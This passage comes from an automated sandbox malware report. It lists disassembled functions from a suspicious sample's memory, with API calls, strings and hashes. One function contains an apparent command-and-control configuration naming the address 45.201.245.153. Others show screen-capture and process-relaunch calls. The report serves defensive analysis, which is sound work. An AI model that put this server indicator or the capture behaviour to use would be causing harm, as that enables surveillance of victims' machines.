__updatetlocinfoEx_nolock.LIBCMT ref: 02F0E2A4

Memory Dump Source

Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: ebfb0181292ac289b0d5b5b32306ec79510727e74572f2a87836eccbd5c50ebc
Instruction ID: 8f8f0ab373c5e09d73a9901e6da50d5dbdb26659107a9f0fd5d530c29aea08bc
Opcode Fuzzy Hash: ebfb0181292ac289b0d5b5b32306ec79510727e74572f2a87836eccbd5c50ebc
Instruction Fuzzy Hash: A5F02432E45300DBE730BBF49D81B4D73A16F08BE0F01450ADB486B1C1CBA04841FE51

Function 6C3D8EFF Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 6C3D8F0B

Part of subcall function 6C3D9165: __getptd_noexit.LIBCMT ref: 6C3D9168
Part of subcall function 6C3D9165: __amsg_exit.LIBCMT ref: 6C3D9175

__getptd.LIBCMT ref: 6C3D8F22
__amsg_exit.LIBCMT ref: 6C3D8F30
__lock.LIBCMT ref: 6C3D8F40
__updatetlocinfoEx_nolock.LIBCMT ref: 6C3D8F54

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 1850ba5f8fa9c53f41582350c5004f3b9b4ae2c47d4f429ea5fa3c445bd5739d
Instruction ID: 8e217e006a69ac6ad6ad6cc363ef117aceb22a1b86ed9a8a97ece5b954d4fb25
Opcode Fuzzy Hash: 1850ba5f8fa9c53f41582350c5004f3b9b4ae2c47d4f429ea5fa3c445bd5739d
Instruction Fuzzy Hash: E1F06233D05700AAE621AB689405B8A73A5AF0176CF23510AD494A6FC0CF357945CE97

Function 03D88AB0 Relevance: 7.5, APIs: 5, Instructions: 33processCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,000001FE), ref: 03D88AD2
GetCommandLineW.KERNEL32 ref: 03D88AD8
GetStartupInfoW.KERNEL32(?), ref: 03D88AE7
CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000020,00000000,00000000,?,?), ref: 03D88B0F
ExitProcess.KERNEL32 ref: 03D88B17

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: Process$CommandCreateExitFileInfoLineModuleNameStartup
String ID:
API String ID: 3421218197-0
Opcode ID: 56f233135b2d6d59a07ef80145853e0bf372abac146b4f01403fe2929769d7e1
Instruction ID: d20076a0f4b6e71b5975c077fc290b20235b23e91abadbcb73d2fd48a841e4c4
Opcode Fuzzy Hash: 56f233135b2d6d59a07ef80145853e0bf372abac146b4f01403fe2929769d7e1
Instruction Fuzzy Hash: BCF09073584319FBE720ABA0DC4DF997778EB04B10F100694B315AA1C4EA70AA48CF54

Function 03D975E0 Relevance: 7.5, APIs: 5, Instructions: 33processCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,000001FE), ref: 03D97602
GetCommandLineW.KERNEL32 ref: 03D97608
GetStartupInfoW.KERNEL32(?), ref: 03D97617
CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000020,00000000,00000000,?,?), ref: 03D9763F
ExitProcess.KERNEL32 ref: 03D97647

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: Process$CommandCreateExitFileInfoLineModuleNameStartup
String ID:
API String ID: 3421218197-0
Opcode ID: 34e83d5ce8656076c145a56b6fc7304ac1dcfa762b15a7bfc77a13dbd3e4dad4
Instruction ID: 9b5b2290c890a1ba1e2e5d593be65674f5b18b71a4567dbfba8770e888978be1
Opcode Fuzzy Hash: 34e83d5ce8656076c145a56b6fc7304ac1dcfa762b15a7bfc77a13dbd3e4dad4
Instruction Fuzzy Hash: 02F03073544318FBEB20ABA4DC4DFEA7778EB04B11F100694B715AA1D4EA70AA89CF54

Function 03D9AE83 Relevance: 7.5, APIs: 5, Instructions: 24threadCOMMON

Download Yara Rule

APIs

Part of subcall function 03DA0870: _doexit.LIBCMT ref: 03DA087C

___set_flsgetvalue.LIBCMT ref: 03D9AE95

Part of subcall function 03DA288A: TlsGetValue.KERNEL32(00000000,03DA29E3,?,03D9FCE2,00000000,00000001,00000000,?,03DA8D2E,00000018,03DB79F0,0000000C,03DA8DBE,00000000,00000000), ref: 03DA2893
Part of subcall function 03DA288A: DecodePointer.KERNEL32(?,03D9FCE2,00000000,00000001,00000000,?,03DA8D2E,00000018,03DB79F0,0000000C,03DA8DBE,00000000,00000000,?,03DA2AF0,0000000D), ref: 03DA28A5
Part of subcall function 03DA288A: TlsSetValue.KERNEL32(00000000,?,03D9FCE2,00000000,00000001,00000000,?,03DA8D2E,00000018,03DB79F0,0000000C,03DA8DBE,00000000,00000000,?,03DA2AF0), ref: 03DA28B4

___fls_getvalue@4.LIBCMT ref: 03D9AEA0

Part of subcall function 03DA286A: TlsGetValue.KERNEL32(?,?,03D9AEA5,00000000), ref: 03DA2878

___fls_setvalue@8.LIBCMT ref: 03D9AEB3

Part of subcall function 03DA28BE: DecodePointer.KERNEL32(?,?,?,03D9AEB8,00000000,?,00000000), ref: 03DA28CF

GetLastError.KERNEL32(00000000,?,00000000), ref: 03D9AEBC
ExitThread.KERNEL32 ref: 03D9AEC3
GetCurrentThreadId.KERNEL32 ref: 03D9AEC9
__freefls@4.LIBCMT ref: 03D9AEE9

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
String ID:
API String ID: 781180411-0
Opcode ID: ede2ae841235e28e7656a58f035172416733e6f0644d78b1fc483717ea0addec
Instruction ID: f055cce3ff1a4d004d738d336cac2d4e2f512436804ec1d95e880b2a820ea7ec
Opcode Fuzzy Hash: ede2ae841235e28e7656a58f035172416733e6f0644d78b1fc483717ea0addec
Instruction Fuzzy Hash: F0E04F2BC00B0AABDF09B7F68A0898F362CDE01790B040D10FD009B104FB24D90146B2

Function 02F072BA Relevance: 7.5, APIs: 5, Instructions: 24threadCOMMON

Download Yara Rule

APIs

Part of subcall function 02F08400: _doexit.LIBCMT ref: 02F0840C

___set_flsgetvalue.LIBCMT ref: 02F072CC

Part of subcall function 02F09823: TlsGetValue.KERNEL32(00000000,02F0997C,?,02F0A080,00000000,00000001,00000000,?,02F0C1E0,00000018,02F17BF0,0000000C,02F0C270,00000000,00000000), ref: 02F0982C
Part of subcall function 02F09823: DecodePointer.KERNEL32(?,02F0A080,00000000,00000001,00000000,?,02F0C1E0,00000018,02F17BF0,0000000C,02F0C270,00000000,00000000,?,02F09A89,0000000D), ref: 02F0983E
Part of subcall function 02F09823: TlsSetValue.KERNEL32(00000000,?,02F0A080,00000000,00000001,00000000,?,02F0C1E0,00000018,02F17BF0,0000000C,02F0C270,00000000,00000000,?,02F09A89), ref: 02F0984D

___fls_getvalue@4.LIBCMT ref: 02F072D7

Part of subcall function 02F09803: TlsGetValue.KERNEL32(?,?,02F072DC,00000000), ref: 02F09811

___fls_setvalue@8.LIBCMT ref: 02F072EA

Part of subcall function 02F09857: DecodePointer.KERNEL32(?,?,?,02F072EF,00000000,?,00000000), ref: 02F09868

GetLastError.KERNEL32(00000000,?,00000000), ref: 02F072F3
ExitThread.KERNEL32 ref: 02F072FA
GetCurrentThreadId.KERNEL32 ref: 02F07300
__freefls@4.LIBCMT ref: 02F07320

Memory Dump Source

Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd

Similarity

API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
String ID:
API String ID: 781180411-0
Opcode ID: 22e2b160d835f9f5b986fa4dea95e60b9237c095cab8022cf2fb42d6f555d81c
Instruction ID: a5d0dc5a18c712988016d3ab46eaea531e39c4bc12257e1bedeffd7ac5d086ee
Opcode Fuzzy Hash: 22e2b160d835f9f5b986fa4dea95e60b9237c095cab8022cf2fb42d6f555d81c
Instruction Fuzzy Hash: F6E0BF31C402096BDF0137F19D98E5F769E9D40BD4BD14450EF10972C2FB68A412AEEA

Function 6C36FE33 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 333COMMON

Download Yara Rule

APIs

_sprintf.LIBCMT ref: 6C36FE83

Part of subcall function 6C3D26E0: __atof_l.LIBCMT ref: 6C3D26EA

_sprintf.LIBCMT ref: 6C37017F

Strings

Unknown parameter: '%s'Context: ', xrefs: 6C370171
Couldn't get parameter %d due to end of line., xrefs: 6C36FE7D

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: _sprintf$__atof_l
String ID: Couldn't get parameter %d due to end of line.$Unknown parameter: '%s'Context: '
API String ID: 2076877804-16269964
Opcode ID: 2f8442d17c0498e4bdf37f5b9169d5a31273de9019df251268e7761eec3b6b3c
Instruction ID: 953cd01fb5d01a118a4e9c2419316bee991d286a85f4e6ba63fafcff37a554a5
Opcode Fuzzy Hash: 2f8442d17c0498e4bdf37f5b9169d5a31273de9019df251268e7761eec3b6b3c
Instruction Fuzzy Hash: BAB1663250D2818EE721CE39C4443DEBBA5AB8B32CF10491ED4D59BE85C77B8449CFA6

Function 03D90E80 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 297COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 03D9125D
__CxxThrowException@8.LIBCMT ref: 03D91274

Strings

corrupted regex pattern, xrefs: 03D91255
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_, xrefs: 03D90F5E, 03D90F84

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: Exception@8Throwstd::exception::exception
String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_$corrupted regex pattern
API String ID: 3728558374-3133971423
Opcode ID: 7af9138d2d317927b9761a15dfc2ffb5f3e035cd6e0766759e99843b28900444
Instruction ID: a7a7799f4831365b11144f60457de18e89bc40613e1195518dce6f57a8301443
Opcode Fuzzy Hash: 7af9138d2d317927b9761a15dfc2ffb5f3e035cd6e0766759e99843b28900444
Instruction Fuzzy Hash: CEB1D635604242AFEF14DF14D4C47A6BBE5AF85710F4C85AEDC8A9F24AC370E949C762

Function 03D92AE0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 131COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 03D92B2C

Part of subcall function 03D99AB7: std::exception::exception.LIBCMT ref: 03D99ACC
Part of subcall function 03D99AB7: __CxxThrowException@8.LIBCMT ref: 03D99AE1
Part of subcall function 03D99AB7: std::exception::exception.LIBCMT ref: 03D99AF2

_memmove.LIBCMT ref: 03D92B84
_memmove.LIBCMT ref: 03D92BAA

Strings

vector<T> too long, xrefs: 03D92B27

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: _memmovestd::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: vector<T> too long
API String ID: 2063937883-3788999226
Opcode ID: d326fede0b3af9cb3e4c8236f7bc7709e3fccdac82f1a58e71322efec01b45e5
Instruction ID: ac002d7414b536119d75c69526e6cb9e77d05abb7782eeddce1423b4c58b1d44
Opcode Fuzzy Hash: d326fede0b3af9cb3e4c8236f7bc7709e3fccdac82f1a58e71322efec01b45e5
Instruction Fuzzy Hash: 7B41CBB6A007089FDF18DF68D891A7FB7F5EB84710F148A2EE45697744DB35A900C7A0

Function 03D8BF50 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 03D8BFF7
__Strxfrm.LIBCPMT ref: 03D8C056
std::_Xinvalid_argument.LIBCPMT ref: 03D8C083

Strings

invalid string position, xrefs: 03D8C07E

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: StrxfrmXinvalid_argument_memmovestd::_
String ID: invalid string position
API String ID: 3306385690-1799206989
Opcode ID: 2a77438561c9af4b98a4d3ac76fa5c4789486c5e4a4dde86d6c64980b9a1a45c
Instruction ID: 31fa0f9893f2cf94b34fc1cbf0f61ffbca12a0b055f77887f737234fd6586096
Opcode Fuzzy Hash: 2a77438561c9af4b98a4d3ac76fa5c4789486c5e4a4dde86d6c64980b9a1a45c
Instruction Fuzzy Hash: 1F417E71710244DBD724EF6CC840B6EF7EAEB40A54F144A1EE4A28B684D7B6F94487A0

Function 03D8C2B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 03D8C2C8

Part of subcall function 03D99AB7: std::exception::exception.LIBCMT ref: 03D99ACC
Part of subcall function 03D99AB7: __CxxThrowException@8.LIBCMT ref: 03D99AE1
Part of subcall function 03D99AB7: std::exception::exception.LIBCMT ref: 03D99AF2

std::_Xinvalid_argument.LIBCPMT ref: 03D8C2E3

Strings

string too long, xrefs: 03D8C2C3, 03D8C2DE

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
String ID: string too long
API String ID: 963545896-2556327735
Opcode ID: f07da6f6c34060d43a924fe30270db5dee42a2f3cbf3135a229c9725abb168c0
Instruction ID: db5587c6ba22165a66d56ef853c4b1bc12d7dfc2faa527f5a3609e4565e4ea2f
Opcode Fuzzy Hash: f07da6f6c34060d43a924fe30270db5dee42a2f3cbf3135a229c9725abb168c0
Instruction Fuzzy Hash: F221A832B14740DFD331EF6C98C092EF7E9EF66A10B14065EE4928B691C7B1B8458371

Function 03D95E5D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 03D96940: GetDesktopWindow.USER32 ref: 03D9695F
Part of subcall function 03D96940: GetDC.USER32(00000000), ref: 03D9696C
Part of subcall function 03D96940: CreateCompatibleDC.GDI32(00000000), ref: 03D96972
Part of subcall function 03D96940: GetDC.USER32(00000000), ref: 03D9697D
Part of subcall function 03D96940: GetDeviceCaps.GDI32(00000000,00000008), ref: 03D9698A
Part of subcall function 03D96940: GetDeviceCaps.GDI32(00000000,00000076), ref: 03D96992
Part of subcall function 03D96940: ReleaseDC.USER32(00000000,00000000), ref: 03D969A3
Part of subcall function 03D96940: GetSystemMetrics.USER32(0000004C), ref: 03D96A48
Part of subcall function 03D96940: GetSystemMetrics.USER32(0000004D), ref: 03D96A5D
Part of subcall function 03D96940: CreateCompatibleBitmap.GDI32(?,?,00000000), ref: 03D96A76
Part of subcall function 03D96940: SelectObject.GDI32(?,00000000), ref: 03D96A84
Part of subcall function 03D96940: SetStretchBltMode.GDI32(?,00000003), ref: 03D96A90
Part of subcall function 03D96940: GetSystemMetrics.USER32(0000004F), ref: 03D96A9D
Part of subcall function 03D96940: GetSystemMetrics.USER32(0000004E), ref: 03D96AB0

_memmove.LIBCMT ref: 03D95F16

Part of subcall function 03D9ABD2: _malloc.LIBCMT ref: 03D9ABEC

_memset.LIBCMT ref: 03D95EA1
swprintf.LIBCMT ref: 03D95EC4

Strings

%s %s, xrefs: 03D95EB3

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: MetricsSystem$CapsCompatibleCreateDevice$BitmapDesktopModeObjectReleaseSelectStretchWindow_malloc_memmove_memsetswprintf
String ID: %s %s
API String ID: 1388310237-581060391
Opcode ID: 137d03e06b2c177d6dc0a4f2ad0761d40211cd874068409d2c800625b616da39
Instruction ID: 68fabc57d5c1916977f54ec596347f00071493665beacdf197e83d9accddfb83
Opcode Fuzzy Hash: 137d03e06b2c177d6dc0a4f2ad0761d40211cd874068409d2c800625b616da39
Instruction Fuzzy Hash: 6321D3B6A04300ABE712EF15A880E5FB7E9EFD5714F04092EF8895B241E6719918C7B3

Function 6C3C8EBB Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 30COMMON

Download Yara Rule

APIs

_fprintf.LIBCMT ref: 6C3C8F0B

Strings

/Astro[%d 0 0 -%d 0 0]sf, xrefs: 6C3C8EE2
/Courier[%d 0 0 -%d 0 0]sf, xrefs: 6C3C8F00
/Times-Roman[%d 0 0 -%d 0 0]sf, xrefs: 6C3C8EF5

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: _fprintf
String ID: /Astro[%d 0 0 -%d 0 0]sf$/Courier[%d 0 0 -%d 0 0]sf$/Times-Roman[%d 0 0 -%d 0 0]sf
API String ID: 1654120334-2185384684
Opcode ID: 7dd01853f40d986085f16deb8636820d1d69dea4829ec5b66024498c0d29ad77
Instruction ID: 509d1a8a868a2a836890ec2e5bd8c6061db15bdb397d69fa7e1fa55f6f4caae2
Opcode Fuzzy Hash: 7dd01853f40d986085f16deb8636820d1d69dea4829ec5b66024498c0d29ad77
Instruction Fuzzy Hash: EDF02032B44228AAEB10F728CC02FAE606AD32A30CF118517F814E3980D3669D850E93

Function 02F063B0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28stringsynchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

lstrlenW.KERNEL32(|p1:45.201.245.153|o1:80|t1:1|p2:45.201.245.153|o2:80|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:,?,02F07899,?,?,?,?,?,?,02F17B00,0000000C,02F07941,?), ref: 02F063C6

Part of subcall function 02F05E30: _memset.LIBCMT ref: 02F05E61

CreateThread.KERNEL32(00000000,00000000,02F06110,00000000,00000000,00000000), ref: 02F063EE
WaitForSingleObject.KERNEL32(00000000,000000FF,?,02F07899,?,?,?,?,?,?,02F17B00,0000000C,02F07941,?), ref: 02F063FC

Strings

|p1:45.201.245.153|o1:80|t1:1|p2:45.201.245.153|o2:80|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:, xrefs: 02F063C1

Memory Dump Source

Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd

Similarity

API ID: CreateObjectSingleThreadWait_memsetlstrlen
String ID: |p1:45.201.245.153|o1:80|t1:1|p2:45.201.245.153|o2:80|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:
API String ID: 2656291350-4171861867
Opcode ID: dc50a521f217a4255df46e5706373d0c9d22b0b757026c16c3dd30f698b871fd
Instruction ID: d1bf967008552fe1c51652ffeca811d67880c8d937b5a638fc4cd16e3fda2622
Opcode Fuzzy Hash: dc50a521f217a4255df46e5706373d0c9d22b0b757026c16c3dd30f698b871fd
Instruction Fuzzy Hash: EBF06534EC131DAAFB2057949D8EF09B368A700FD1FD14A11F305D91C8D7F0A5719A15

Function 6C3D6F04 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 25COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,6C3D6F3D,00000000,00000000,00000000,00000000,00000000,6C3EE8EC,?,6C3DB838,00000003,6C3D37EE,00000001,00000000,00000000), ref: 6C3D6F0F
__invoke_watson.LIBCMT ref: 6C3D6F2B

Strings

PNv, xrefs: 6C3D6F0F
HK7l, xrefs: 6C3D6F1F

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: DecodePointer__invoke_watson
String ID: HK7l$PNv
API String ID: 4034010525-3572412945
Opcode ID: 82e29a2328bc8ad192febc71234a102e7f71b9ed9e0902d969dc9b2f845db7c2
Instruction ID: 5b0ac59bb9c1898883925bb05699912f90304b0a80d2bcfd7a6044d9e4f182d5
Opcode Fuzzy Hash: 82e29a2328bc8ad192febc71234a102e7f71b9ed9e0902d969dc9b2f845db7c2
Instruction Fuzzy Hash: 85E0EC72110609BBDF021F61CD099AA3F7AEB44290B560810FE24C1530D737D834DB92

Function 6C371814 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 25windowCOMMON

Download Yara Rule

APIs

_sprintf.LIBCMT ref: 6C37183B
MessageBoxA.USER32(?,?,00000030), ref: 6C371850

Strings

Astrolog, xrefs: 6C37182D
%s Error, xrefs: 6C371835

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
